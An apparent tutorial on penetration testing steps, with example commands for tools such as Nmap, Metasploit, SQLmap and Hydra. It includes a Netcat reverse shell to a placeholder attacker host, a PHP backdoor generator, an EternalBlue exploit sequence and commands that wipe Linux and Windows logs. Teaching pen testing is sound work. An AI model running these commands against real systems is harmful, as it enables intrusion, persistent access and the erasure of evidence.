A Comprehensive Guide to Penetration Testing: Steps, Tools, and Commands
In 2025, cyber threats are evolving rapidly, making penetration testing (pen testing) a critical security practice for businesses. Pen testing helps identify vulnerabilities before attackers can exploit them. This guide covers the key steps of penetration testing, along with essential tools and example commands used in ethical hacking.
Understanding Penetration Testing
Penetration testing is a simulated cyberattack against an organization’s IT infrastructure to uncover security weaknesses. It follows a structured approach based on industry-standard methodologies like:
NIST 800-115 (Technical Guide to Information Security Testing)
OWASP Testing Guide (For web applications)
MITRE ATT&CK Framework (Adversary tactics and techniques)
Pen testers use ethical hacking techniques to mimic real-world attacks, assess security risks, and recommend remediation strategies.
Penetration Testing Steps
Step 1: Reconnaissance (Information Gathering)
The first step is gathering as much information as possible about the target. This includes domain names, IP addresses, open ports, and employee details.
Tools and Commands:
whois – Retrieves domain registration information
whois example.comnslookup – Finds DNS records
nslookup example.com
theHarvester – Collects emails, subdomains, and employee names
theHarvester -d example.com -l 500 -b google
Shodan – A search engine for internet-connected devices
shodan search "apache"
Step 2: Scanning and Enumeration
Once reconnaissance is complete, scanning identifies open ports, services, and vulnerabilities.
Tools and Commands:
Nmap – Scans for open ports and services
nmap -A -T4 example.com
Nikto – Web vulnerability scanner
nikto -h http://example.com
Enum4Linux – Extracts SMB and NetBIOS information
enum4linux -a 192.168.1.10
Gobuster – Directory and file brute-force scanner
gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt
Step 3: Gaining Access (Exploitation)
This step involves exploiting identified vulnerabilities to gain control of the system.
Tools and Commands:
Metasploit Framework – Exploit development and execution
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
exploit
SQLmap – Automated SQL injection tool
sqlmap -u "http://example.com/page.php?id=1" --dbs
Hydra – Brute-force login attacks
hydra -l admin -P passwords.txt ftp://192.168.1.10
Step 4: Privilege Escalation
Once access is gained, privilege escalation is used to move from a low-privileged account to an administrator/root account.
Tools and Commands:
Linux Privilege Escalation Script
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
Windows Privilege Escalation via PowerShell
whoami /priv
Exploit SUID binaries on Linux
find / -perm -4000 -type f 2>/dev/null
Step 5: Maintaining Access (Persistence)
Attackers often create backdoors to maintain access after an initial compromise.
Tools and Commands:
Netcat backdoor
nc -lvnp 4444
nc -e /bin/bash attacker_ip 4444
Weevely – PHP backdoor
weevely generate mypassword backdoor.php
Step 6: Covering Tracks
To avoid detection, attackers erase logs and traces of their activities. Ethical hackers should document everything and never delete logs unless authorized.
Commands:
Clear Linux logs
echo "" > /var/log/auth.log
Windows Event Log Clearing
wevtutil cl Security
Step 7: Reporting and Remediation
The final step is documenting all findings, vulnerabilities, and exploits, along with recommendations to fix them.
A penetration testing report typically includes:
Executive Summary – High-level risks and impact
Technical Details – Steps taken, tools used, and vulnerabilities found
Risk Rating – Categorization of risks based on severity
Remediation Steps – Recommended actions to mitigate risks
Legal and Ethical Considerations
Ethical hacking must always be conducted with proper authorization. Pen testers must follow:
Written consent from the target organization
Legal guidelines under cybersecurity laws
Responsible disclosure policies
Unauthorized hacking is illegal and punishable under laws like:
Computer Fraud and Abuse Act (CFAA) – USA
General Data Protection Regulation (GDPR) – EU
Information Technology Act – India
